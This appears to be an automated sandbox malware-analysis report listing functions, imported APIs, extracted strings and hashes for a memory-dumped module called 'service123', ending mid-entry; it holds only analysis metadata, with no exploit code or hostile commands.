Opcode ID: 5a95fda771f8c3923d5d8e5c8ba3b3125cca0bf1d14091200891abca4199db39
Instruction ID: 4aac3f86d48a23c8c43f5d574ae4c518b35c8ffd853990fb84cacfea162af56e
Opcode Fuzzy Hash: 5a95fda771f8c3923d5d8e5c8ba3b3125cca0bf1d14091200891abca4199db39
Instruction Fuzzy Hash: C9513B71A052068FCB10DF59D58492AFBF0FF8635CB954559D8988BB10E731E854CFA3

Function 6C39B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa71052c6e18cc0dc5b13377191ec51539b078a456f507c54152f0a933dfa48
Instruction ID: 3646fc12763852d5ec2c354cb376c56e9e9b9087cf462d259b1b8cc5dc36374f
Opcode Fuzzy Hash: 4aa71052c6e18cc0dc5b13377191ec51539b078a456f507c54152f0a933dfa48
Instruction Fuzzy Hash: 7431ADB17052018FDB20EF68D9C0A5AB7B4BF4631CB884668C9548FB55E731D4448F63

Non-executed Functions

Function 6C38CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C38CD7D

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1d6c43fd2d76cbba1b57f4efe78e56bfdd3c239cdeb8c5edb958a02c33943daa
Instruction ID: 6c779326baaa18826120afd9cbc8f8db1c4088a06c3f13215a240e1ea25d550d
Opcode Fuzzy Hash: 1d6c43fd2d76cbba1b57f4efe78e56bfdd3c239cdeb8c5edb958a02c33943daa
Instruction Fuzzy Hash: 440205B150A7518FD700CF29C044795FBE2AF86318F1987AED8E85BB91C376A449CF92

Function 6C390FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C390FCA
strlen.MSVCRT ref: 6C390FD4

Strings

5, xrefs: 6C3914D2
inity, xrefs: 6C391E21
!, xrefs: 6C392C08
, xrefs: 6C39240F

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: d5956670cfa9b145e41538fc1e9671d0b1bfaad3291eb46d70e95db12e953335
Instruction ID: 3712ca883417721b4eb6a5a1762b10c6b7635f727f17e20e612b833646c2247f
Opcode Fuzzy Hash: d5956670cfa9b145e41538fc1e9671d0b1bfaad3291eb46d70e95db12e953335
Instruction Fuzzy Hash: 24F24675A087818FD720DF29C18479ABBF4BF89348F11891EE8D997750E776E8448F82

Function 6C408280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6C40838F
Auth, xrefs: 6C408397
random_device::random_device(const std::string&): unsupported token, xrefs: 6C408482
hardware, xrefs: 6C408450
Genu, xrefs: 6C40841E
rdrand, xrefs: 6C408358
rdrnd, xrefs: 6C4083C8
random_device::random_device(const std::string&): device not available, xrefs: 6C408348
Genu, xrefs: 6C408307
rdseed, xrefs: 6C4082C8
default, xrefs: 6C40829F
Auth, xrefs: 6C408426
Auth, xrefs: 6C4082FF
rand_s, xrefs: 6C408467

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 24e8ccd078880883f996193673dc980365cb72dc97914e5cc224ea9e9612783c
Instruction ID: 6c75e58d2fd11a841f2df54bfd3e613a7950f18359e110e7695f11ac50dcb3ac
Opcode Fuzzy Hash: 24e8ccd078880883f996193673dc980365cb72dc97914e5cc224ea9e9612783c
Instruction Fuzzy Hash: 274148B23583414BE300EB799691F1AB6E6BB80318F208A3ED881CBF51E736D555C723

Function 6C38EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C38F18B
malloc.MSVCRT ref: 6C38F1A8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: bfae9cfb4fea070e463c8d6d7caed313cbe32c3aa364f49057657914d5f3ece6
Instruction ID: ecca1a6dfb97a4512f6396104288133d3e7befce2b0531ad45c2f4f66f239212
Opcode Fuzzy Hash: bfae9cfb4fea070e463c8d6d7caed313cbe32c3aa364f49057657914d5f3ece6
Instruction Fuzzy Hash: 66126C7560A7068FC710CF19C48065AF7E2BFC9718F658A2DE8A997B50D731E809CF92

Function 6C3AE490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3AE4BA
strlen.MSVCRT ref: 6C3AE52A

Strings

basic_string: construction from null is not valid, xrefs: 6C3AE4F2, 6C3AE562, 6C3AE5D2
basic_string: construction from null is not valid, xrefs: 6C3AE61F, 6C3AE670, 6C3AE6C0

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: f4c2e8e7ea501687502304bdabe4a1004e8920ebbfca86e0ed391d6604e81662
Instruction ID: 72463891cfe12e8e20f1adf7122a06c847a9d5463900ce1fdd09bd35bc2b46e7
Opcode Fuzzy Hash: f4c2e8e7ea501687502304bdabe4a1004e8920ebbfca86e0ed391d6604e81662
Instruction Fuzzy Hash: D56172F1A057148FCB00EF2CD48589ABBE4FB45214F46496DE8888B715E335E869CFD2

Function 6C3A0610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3A0636
memcmp.MSVCRT ref: 6C3A0659
memcmp.MSVCRT ref: 6C3A06CF
memcmp.MSVCRT ref: 6C3A0741

Part of subcall function 6C44AB60: strlen.MSVCRT ref: 6C44AB6E

memcmp.MSVCRT ref: 6C3A07D5

Strings

basic_string::compare, xrefs: 6C3A0678, 6C3A06EC, 6C3A075F, 6C3A07F4, 6C3A0810
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3A0680, 6C3A06F4, 6C3A0767, 6C3A07FC, 6C3A0818

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: e6a475074273da1e5f270b2d425d5bbf093f678d14b316a15e23457d27270a5d
Instruction ID: 5bd101726100e09730206da0ce95ff417ad9c75c314c0d30e150d5777509e2b0
Opcode Fuzzy Hash: e6a475074273da1e5f270b2d425d5bbf093f678d14b316a15e23457d27270a5d
Instruction Fuzzy Hash: 24613571A0A7049FD304EF69C88481AFBE5FFC8698F54892DE88987720E232D854CB53

Function 6C399B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C399BA0
GetClipboardData.USER32 ref: 6C399BE7
GlobalLock.KERNEL32 ref: 6C399BF9
GlobalUnlock.KERNEL32 ref: 6C399C1A
CloseClipboard.USER32 ref: 6C399C23

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 9b21333a811b487136bf813a4094a8bed142d38996ebaeccaea5c918c03fd50f
Instruction ID: ee7bf65332eb1fa6df7180c5658fabac4680692f1d0fffa58d7fb1a7ecfe62fc
Opcode Fuzzy Hash: 9b21333a811b487136bf813a4094a8bed142d38996ebaeccaea5c918c03fd50f
Instruction Fuzzy Hash: 6F2131B26092018FDB00FFBDE54966E7FF0AB55254F45492CD88987648EB3AD448CF93

Function 6C3970C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C3970C7
memset.MSVCRT ref: 6C397217

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 41fd2aa8b360b6bd38adb3c1cbc33e81cf58376f56e44d138f649469677ad533
Instruction ID: 08a59a48b212ef5c59b2168335c275ad49094b8eccbc9d32c1ee9ff21b88f37d
Opcode Fuzzy Hash: 41fd2aa8b360b6bd38adb3c1cbc33e81cf58376f56e44d138f649469677ad533
Instruction Fuzzy Hash: D842A1716093158FD700CF29C48035ABBE2BF86308F15896DE8D58BB85E776E949CF92

Function 6C395880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6C397074
Infinity, xrefs: 6C395BE0
, xrefs: 6C396D95
NaN, xrefs: 6C395B5F

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 05a0b5edff56fa9c68f25f5cc9799e60797529c16a940fa4e205470d9ab444c7
Instruction ID: e84fb6ab34086b40e4175bfdf0539a9c492e341c0843e16a52970fe375bc6a14
Opcode Fuzzy Hash: 05a0b5edff56fa9c68f25f5cc9799e60797529c16a940fa4e205470d9ab444c7
Instruction Fuzzy Hash: EAE220B1A0A3418FD750DF29C18074AFBF0BB89798F148A1EE8D597751E776E8448F82

Function 00CB51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 00CB66C5
, xrefs: 00CB69A4

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 7d313633062274d0f6256bb0aef56376bc21470ef6f330cf738e84973e99cc29
Instruction ID: b771bc034a42c98936447d6c6ddb5993e1af1013df3821de1fb1a60c846c7de4
Opcode Fuzzy Hash: 7d313633062274d0f6256bb0aef56376bc21470ef6f330cf738e84973e99cc29
Instruction Fuzzy Hash: FCE220B1A087818FD720DF29C18479AFBE0BF88754F14891DE8D997361E779E9448F82

Function 00CB3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 00CB3FD9
gfff, xrefs: 00CB3F2C
gfff, xrefs: 00CB3F43
., xrefs: 00CB4114

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 2b0cd56d511ead3b3ddfe8b4066d8c7fdb716012acb5080790fdd68aecc7b599
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 09D1F871A083468BDB18DF29C48039BBBE2EFD4340F18C92DE8559B356D770DE499792

Function 6C3944F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C3945FC
., xrefs: 6C3947E4
@, xrefs: 6C3946A9
gfff, xrefs: 6C394613

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 43673aa735f0cb8e4d96d05debb5f3f540fce44a6d87b76fd5a7c8d9d1c9cae0
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 4DD1C271A097458BD700DF29C48034BB7E2AFC5348F19C92DE8A88BB55F772D9098F92

Function 6C422EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C423000

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: ceeb0ae6631545cc772ee57ae8de27689ddfdce685392c904e21384587e7a62c
Instruction ID: b89e3ab32ef6c133e5b104b5724a7824b19196f05a7f1a10e5d908d9f4b93f97
Opcode Fuzzy Hash: ceeb0ae6631545cc772ee57ae8de27689ddfdce685392c904e21384587e7a62c
Instruction Fuzzy Hash: 944169B29097108FC724DF29D480E5AFBF4AF99314F15896EE8988B319D334D845CBA2

Function 6C4204E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C420550
memset.MSVCRT ref: 6C420574

Strings

basic_string::_M_replace_aux, xrefs: 6C4205F0

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: c93370344357ea34731ee8be351fec6a2f3acae557159e70d99babf2a2e96211
Instruction ID: 40f845d0d4ba5f03f9fefc27ef780f7255ee99dda27f8dcd4ed5c5f5cac01df7
Opcode Fuzzy Hash: c93370344357ea34731ee8be351fec6a2f3acae557159e70d99babf2a2e96211
Instruction Fuzzy Hash: 5E319EB56097908FC701DF2CC4D1E2ABBF1AFC6214F14896EE8A88B715E735D884CB52

Function 6C3F35F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C3F3648
memcpy.MSVCRT ref: 6C3F36C1

Part of subcall function 6C3F5340: memcpy.MSVCRT ref: 6C3F53D0

Strings

basic_string::_M_replace_aux, xrefs: 6C3F3670

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: e97b66ec5b4a659e3ed8e25919f2964cb4145522df87427c77c791372b9f6815
Instruction ID: 85035abee66b55d87c7d241617addf47c632578dc424f7e4cbd0efc147785e84
Opcode Fuzzy Hash: e97b66ec5b4a659e3ed8e25919f2964cb4145522df87427c77c791372b9f6815
Instruction Fuzzy Hash: EA214F72A0A3149FC300AF1DD88096EFBE4EB85668F94496EF89897311D371D855CB93

Function 6C3AA790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3AA7AD
wcslen.MSVCRT ref: 6C3AA7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C3AA7D0, 6C3AA820

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: e1defb74bcb87c46262d6c833bea3bc43e165b7fa2c99aa4c86cd48a39e7e0e6
Instruction ID: 89fcbde8042193c37061b1c48603f6da9516ace30263679447618ee09b0f2baa
Opcode Fuzzy Hash: e1defb74bcb87c46262d6c833bea3bc43e165b7fa2c99aa4c86cd48a39e7e0e6
Instruction Fuzzy Hash: 2B115EB19153248FCB10EF6CD480CAABBF4EB45214F02096DE8C89B715E336E959CF92

Function 6C3AA3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3AA3BD
wcslen.MSVCRT ref: 6C3AA40D

Strings

basic_string: construction from null is not valid, xrefs: 6C3AA3E0, 6C3AA430

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: e1defb74bcb87c46262d6c833bea3bc43e165b7fa2c99aa4c86cd48a39e7e0e6
Instruction ID: ef26c10935f4892e2e4bf836bc34afe1f0b859db24c63aa15b5b0be422f0e71c
